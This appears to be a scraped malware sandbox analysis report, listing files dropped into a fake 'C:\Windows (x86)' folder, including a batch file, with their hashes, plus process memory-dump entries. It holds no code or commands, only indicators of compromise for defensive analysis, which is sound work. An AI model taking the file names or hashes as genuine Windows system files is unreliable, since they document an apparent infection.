f3db39d0328a3c6c3226a352125a2f0f778982253afb1a171dcbce9924a30627

SHA512
0fcd0b0dffb369cd33c174dcc10959cf7a157e3c293911f7a705eb1117ae7ec31f79cfb4230c475a894f419f1f0f6c108e932ecf68746778c63d7f597b52952b

Download Submit
C:\Windows (x86)\icmp.dll

Filesize
3KB

MD5
225f69152008527eaf2b8f44a48fb95e

SHA1
ccb1d8b424a8061804b6421b94e3892f8cb7cd89

SHA256
f0d008682013a54a20d169ba702b72f4c5d0d7c12de09ccdecf514b2928182f6

SHA512
b8e10fa6f8e19f440f97454133c723265b492926c309f422eb720ba9c990790bad4e7e63fb27658bf2240de341ca71c5053f703eea286d9a08382e3c1620a3e8

Download Submit
C:\Windows (x86)\ieuinit.inf

Filesize
3KB

MD5
c1127463655f541956ff02a325996ecf

SHA1
a43961de9c70bac7c807d679376083904f8c4d7d

SHA256
9437a11c86057ec560402db712cbafeebcfc5df8fe389105c65751ecf0d02abc

SHA512
c0874025afbc94844f8354d2ab1e8c686eaca68df2c2e0690fe210e0f0df4e658c26121149111a60f747707c7f4e34d0e8f6a662b632c0bdc6e04d7ddfe60630

Download Submit
C:\Windows (x86)\iglhxs64.vp

Filesize
4KB

MD5
8589ccd79af444175f0e91ac27c6343e

SHA1
2fe8411d582d22b0132b6cf10dec81547c7e4ff6

SHA256
2498331bf9ffe87bcbefb811512192866ac5db4d9f7f1826b071e10739964a9c

SHA512
1e70cb606d4d8e71c330988bc21b80ddd795bac697546c74458fdeb8bca53d690f680929395b9db82b4922b312d93f56edf0fa7dda6173fe144fea5d1e022734

Download Submit
C:\Windows (x86)\iologmsg.dll

Filesize
2KB

MD5
db13e4ffebd3b99066beaa509854b225

SHA1
6a7c6e2bb582a9aa9fd37db39fa170b3f8a19faa

SHA256
4d0f4c3e54126ea132930bc66f28f25c6e2be7df597f688b986c59bd0c787343

SHA512
49bedc1416cecce822fddebec6c1d28127fc1fbd15d9527d8a25d1767595940ac364ead9eceb05b204dfe3ad43c1329e334adcfcd67ad7bc8d1d235ac7c1ddfd

Download Submit
C:\Windows (x86)\kanji_1.uce

Filesize
6KB

MD5
7c0c25f4ba1084c4abbeea2c74194c5f

SHA1
618b9958703b4c109a94a3630ab3f2baa364a8a3

SHA256
2373bf7e4f975d25fb3eabe004fbe138f9dba7ed6ffb9c967edc134d4d5956b7

SHA512
2d043ba789e30690d1591cce623e31910a9b8775de62ca173c6a2794174cde6837f5a9c8f646bc86d1fe838dcd4f6c33765e5d87337fb8b159c273152a933f7c

Download Submit
C:\Windows (x86)\kanji_2.uce

Filesize
8KB

MD5
529bbd63519bbd654ef328454019693f

SHA1
77ff1ec7c3192dce109d15b3bc54013d102714a6

SHA256
32e4e19efb2f90bd439c6bba865563857d664fa6da87cb195e85ee97a0853bfc

SHA512
eb82ac419003078503d9c7e9e826bbc9c56adf12d456a287e80c079d9991728aed49199318d63fda17596856c9294cdc9b8561e26efab941d4e046c68702bf70

Download Submit
C:\Windows (x86)\kbd101.dll

Filesize
8KB

MD5
8ffda05cf3f0c173ff428490de3b2d09

SHA1
229412646a8308acfc3f6afd1339ab8d0221bd1e

SHA256
48f620ed308217b745c4e2e4293690ebc5f2dc9369d892775365a66be4691ce8

SHA512
8bfb730f76ea555884309fa98240e1b1fb495e9cd6ed8b082eeca1ab1073d955170d6cea704840f84b4bf923bc74d1c57c6e19ba107e401af2adda6445458bbb

Download Submit
C:\Windows (x86)\kbd101a.dll

Filesize
7KB

MD5
6fdcf6e77171991dbb2f57ac4f17b508

SHA1
eeb923a7091f39d31dc47a3a26c4f8e297a2e723

SHA256
65ad0cb85dd0aea1da456809f1b4657286efe78f6229c7067ad4d27eb8dd3457

SHA512
5952e04b36e854d73bd3e89b99c9ae15c4d1c65891112d232b549bca8263f67e9800594a2368883eb104eba6bb243ecffdfc6e7470eafb79f37b59147ec43e16

Download Submit
C:\Windows (x86)\kbd101b.dll

Filesize
7KB

MD5
cad4474377572619bdceff58076e2471

SHA1
bada002938f3cc40e758eae29f43e8de00942723

SHA256
293b7f6d7dfd283c80a2b9f70e460187e26b16a2c757cd93209d47cf7ad9fc71

SHA512
2e1f392c04cc8482e3a49be4c991d348436e133e01e920568753e6abe508cf1dceebd458d7c99fad6adba5048fd5f49ecc69219e7ba2686e3fae7c5787287c3a

Download Submit
C:\Windows (x86)\kbd101c.dll

Filesize
7KB

MD5
494ca01f449fc34d3984fa5d9f16c2f0

SHA1
a476f315426ec5c66f67e13cd05a903e3dbe5b85

SHA256
c70219f49c5fc7235bff42065f0944958e5bedce30d63b12d103e101f9d0fe0a

SHA512
12a40cdfc90a1cff992af8d8b5ee474895148ad19f3b1c08cc6f38d73710a1b7b2c1290e96c06aa720cff178de4b41c399d9a8589eb44ad1bed8efd5adcbcf4b

Download Submit
C:\Windows (x86)\kbd103.dll

Filesize
7KB

MD5
50716cb660d94d70bac6a9d560436e55

SHA1
8928bf435dba073944d98c4300f890f8c05e2115

SHA256
73d33a331d98d8ff508af0a69597689dc64cb628bd0d68548e5cc867bb167817

SHA512
f80598fba77d807629ee7c652503f4ea3c12e7bd37b2a43fe534ad23d9e64144dd0d3ce461cd19fbf300f5555ad9a09a3785decba55050b4092e200c533182e4

Download Submit
C:\Windows (x86)\kbd106.dll

Filesize
8KB

MD5
fa2bdf764abf472d0d955ad560427981

SHA1
20379a7d7e46f8ab381ef845a25b2bb540d33935

SHA256
d6cb37059519bc81f0051b4175b14d6993b0b74ec7117640ecb8f60d7dd092f3

SHA512
802a2d5a7903825f4bdb92adc50d3d66f0fec41ea2824c02cdc0adc78784ee144c3e6927be18bd8dc89f77389ac8c68011f0aa537eb1f40663e94fc810bdc38e

Download Submit
C:\Windows (x86)\kbd106n.dll

Filesize
8KB

MD5
5c11a67e7c34388b888bd859791b979e

SHA1
fec7d3af60864ebe788301e5e0c1d23177c0e6f2

SHA256
50e086509ef2a3719bfb6ecc9f9acde5d665f42c960084552eed4cf0ecf559c2

SHA512
0d20fd5397589736b3cf2c3e9d8ee7f22965051891eee31c7fc585a3ca4d716553a6267b41790485c270572b378fd3ba56c05a5c4d1d9edd29f2bfaa10e75051

Download Submit
C:\Windows (x86)\xagal.bat

Filesize
759B

MD5
104470f3c1211668407c2519f44862f9

SHA1
58054e1f3ef8e70210fe362dd491a65231494fcb

SHA256
cd2c3436284a9e2e6505a01d73edad527e3094a7c7efc7890d476638924ed2bf

SHA512
aa1575f35d252f0a0c19599d87cd44483c3468873cd9f141e22214f22d9b321d227d9a3b027b923ea2a931896f5f7811eabf8f7ff2e7a9d869010049888848d7

Download Submit
memory/424-282-0x00007FF62CCC0000-0x00007FF62D488000-memory.dmp

Filesize
7.8MB

Download
memory/424-284-0x0000024DE6120000-0x0000024DE6140000-memory.dmp

Filesize
128KB

Download
memory/424-283-0x0000024DE6100000-0x0000024DE6120000-memory.dmp

Filesize
128KB

Download
memory/424-286-0x0000024DE6120000-0x0000024DE6140000-memory.dmp

Filesize
128KB

Download
memory/424-285-0x0000024DE6100000-0x0000024DE6120000-memory.dmp

Filesize
128KB

Download
memory/424-287-0x00007FF62CCC0000-0x00007FF62D488000-memory.dmp

Filesize
7.8MB

Download
memory/1468-276-0x00000176BDFA0000-0x00000176BDFC0000-memory.dmp

Filesize
128KB

Download
memory/1468-277-0x00007FF62CCC0000-0x00007FF62D488000-memory.dmp

Filesize
7.8MB

Download
memory/1468-279-0x00000176BDFA0000-0x00000176BDFC0000-memory.dmp

Filesize
128KB

Download
memory/1468-278-0x00000176BDF80000-0x00000176BDFA0000-memory.dmp

Filesize
128KB

Download
memory/1468-275-0x00000176BDF80000-0x00000176BDFA0000-memory.dmp

Filesize
128KB

Download
memory/1468-272-0x00000176BDFA0000-0x00000176BDFC0000-memory.dmp

Filesize
128KB

Download
memory/1468-271-0x00000176BDF80000-0x00000176BDFA0000-memory.dmp

Filesize
128KB

Download
memory/1468-262-0x00000176BDF40000-0x00000176BDF80000-memory.dmp

Filesize
256KB

Download
memory/1468-261-0x00007FF62CCC0000-0x00007FF62D488000-memory.dmp

Filesize
7.8MB

Download
memory/3680-253-0x00007FF62CCC0000-0x00007FF62D488000-memory.dmp

Filesize
7.8MB

Download
memory/3680-252-0x0000028FA0410000-0x0000028FA0430000-memory.dmp

Filesize
128KB

Download
memory/3680-256-0x00007FF62CCC0000-0x00007FF62D488000-memory.dmp

Filesize
7.8MB

Download
memory/4000-267-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/4000-280-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/4312-168-0x00000000732C0000-0x0000000073871000-memory.dmp

Filesize
5.7MB

Download
memory/4312-194-0x00000000732C0000-0x0000000073871000-memory.dmp

Filesize
5.7MB

Download
memory/4988-140-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/4988-263-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/5084-274-0x00000000732C0000-0x0000000073871000-memory.dmp

Filesize
5.7MB

Download
memory/5084-273-0x00000000732C0000-0x0000000073871000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads